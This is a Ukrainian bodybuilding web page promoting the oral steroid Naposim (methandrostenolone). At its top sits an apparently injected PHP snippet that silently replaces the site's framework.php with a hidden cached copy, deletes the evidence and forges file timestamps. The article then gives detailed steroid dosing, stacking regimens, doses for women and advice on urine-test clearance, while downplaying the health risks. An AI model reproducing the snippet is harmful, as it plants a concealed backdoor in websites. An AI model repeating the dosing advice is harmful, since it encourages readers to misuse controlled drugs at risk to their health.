$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Напосім | Спортивне харчування - успіх у бодібілдингу та пауерліфтингу

Напосім

НапосімНапосім - це оральний стероїд новітнього зразка, який має сильний вплив на білковий обмін. Під впливом Напосіма посилюється синтез протеїнів і тим самим прискорюється виробництво білка організмом. Цей ефект виражається в позитивному балансі азоту в організмі і в поліпшенні загального стану людини. На баланс кальцію також здійснюється позитивний вплив: Напосім сприяє надходженню кальцію в кісткову тканину.

Напосім володіє сильною анаболичною і андрогеною дією, яка проявляється у величезному прирості сили і маси. Напосім є стероїдом м'язової маси, який діє швидко і надійно. Прибавка одного-двох кілограмів на тиждень протягом перших шести тижнів - це при прийомі нормальної дози Напосіма. Додаткова вага тіла складається зі справжнього приросту тканини (гіпертрофія м'язових волокон) і перш за все з помітною затримкою рідини в організмі. Надмірної акумуляції води і ароматизації легко уникнути в більшості випадків одночасним комбінуванням з прийомом Тамоксифену і Провірона, так що деякі атлети все ж можуть використовувати Напосім за 7 - 10 днів перед змаганнями.

Спектр дозувань - самий різний, особливо у спортсменів бодібілдерів, штангістів і спортсменів пауерліфтингу. Цей спектр простягається від 2-х таблеток на день до 20 і більше таблеток щоденного прийому. Щоденна доза, реально діюча на атлета, - десь 10 - 40 мг на день. Дозування завжди повинне відповідати індивідуальним особливостям спортсмена. Новачкам в стероїдних курсах ніколи не слід приймати більше 15 - 20 мг на день, тому що вже з цією дозою через 8 - 10 тижнів вони зможуть досягти фантастичних результатів. Якщо ж дія препарату на цю групу спортсменів після закінчення приблизно восьми тижнів знижується, а атлет все ж таки хотів би продовжити курс, йому не слід підвищувати дозу препарату, слід лише на додаток до нього приймати який-небудь ін'єкційний стероїд, типу Дека-дураболін по 200 мг на тиждень або Прімаболан по 200 мг на тиждень або зовсім перейти на один з вищеназваних препаратів.

Застосування тестостерону в цій стадії не рекомендується. Для зовсім нетерплячих і вже досвідчених спортсменів (спортсменів просунутого рівня) чудеса робить комбінація з Напосіма 20 - 30 мг на день і Дека-дураболіну по 200 - 400 мг на тиждень.

По суті атлети без амбіцій з прицілом на змагання можуть досягти гарних успіхів з Напосімом і декою. Атлети великого спорту, Атлети просунутого рівня та ті, які важать понад 100 кг, потребують доз, що не перевищують 40 мг на день, ну і в зовсім рідкісних випадках в 50 мг щоденного прийому. Абсолютно не має сенсу підвищувати кількість таблеток Напосіма до великих масштабів, тому що 15 таблеток не діють в 2 рази краще, ніж 7 або 8. Щоденна доза в 50 мг виходить з чистого незнання спортсменів фактів про препарат, або з відчаю, тому що у деяких внаслідок безперервного або неправильного прийому стероїду не видно жодного прогресу. Одночасне застосування Напосіма і Андроліка 50 - погана ідея, тому що ці два препарати дуже схожі за своїм впливом, внаслідок чого виникає ситуація, подібна тій, коли атлет приймає 10 і більше таблеток Напосіма. Ті, кого в першу чергу цікавить сила, а потім вже м'язова маса, можуть комбінувати Напосім з оксандролоном або Вінстролом (в таблетках). Додатковий прийом будь-якого ін'єкційного стероїду приносить все ж помітно більш кращі результати. Для нарощування сили і м'язової маси особливо підходить сустанон або Тестовірон тривалої дії 250 мг на тиждень і / або Дека-дураболін по 200 мг на тиждень. Для підготовки до змагань Напосім придатний лише із застереженнями, оскільки у багатьох атлетів він викликає велике скупчення води і внаслідок його високої конвертованості в естрогени він ускладнює для атлета процес зменшення жиру. Тих, хто не страждає цією проблемою, а також ті, хто набив руку з Нольвадексом і Провіроном повинен приймати в цій фазі Напосім зі стероїдами для підготовки до змагань: Параболаном, Вінстролом тривалої дії, Провіроном, оксандролоном, Кленбутеролом тощо.

Оскільки Напосім діє лише 4-4.5 годин, його слід приймати щонайменше двічі на день, щоб досягти достатньої концентрації хімічної речовини в крові. Науковими дослідженнями встановлено, що час впливу Напосім в дні тренувань у порівнянні з днями відпочинку від них ще більш короткий, тому має сенс, прийом препарату тричі на день. Оскільки Напосім алькулірований по 17-альфа і вже цим захищений від втрати його діючої хімічної речовини, слід приймати його під час їжі. На третій день після закінчення прийому Напосіма присутність його діючої хімічної речовини метандростенолону (метандіенону) в крові, за результатами аналізів, негативне. Це означає, що дія таблеток минула. Атлет все таки повинен покладатися тільки на негативну урінову пробу, тому що виділення продуктів розпаду метандростенолону з сечею триває довше. Максимальна концентрація діючої хімічної речовини Напосіма в крові досягається через 1-3 години після його прийому. Прийом лише 10мг проявляється у п'ятикратному збільшенні середньої кількості тестостерону чоловіка. Суттєва причина того, чому Напосім добре діє на кожного атлета полягає в тому, що ендрогене вироблення кортизону скорочується на 50 - 70%. Цим сповільнюється в значній мірі відсоток розпаду протеїну в м'язовій клітці.

Жінкам Напосім не радимо, тому що сильний компонент препарату викликає у жінок помітні явища маскулінізації. І все ж таки достатня кількість спортсменок бодібілдерів та особливо спортсменок пауерліфтингу вживають Напосім у дозах в 10 - 20мг на день і досягають величезних успіхів. Жінки, які не чутливі до додаткового припливу андрогенів, і ті, що зовсім не бояться випадкових явищ маскулінізації, добре обходяться дозою в 2 - 4 таблетки протягом максимум 4 - 6 тижнів. Більш високі дози і більш тривалий час прийому препарату приносять найкращі результати, але роблять помітною присутність андрогенів в жіночому організмі. Більше 10 міліграм в день і 50 - 100мг дека дураболіну в день понад 4 - 6 тижнів не повинна приймати ніяка жінка, яка цінує свою жіночність.

Напосім є для більшості атлетів анаболіком "гарного самопочуття", який покращує настрій і підвищує апетит у багатьох спортсменів, у поєднанні з досягнутими результатами, сприяє і покращенню психологічного стану та зростаючій самооцінці.
 
Статті СТЕРОЇДИ Напосім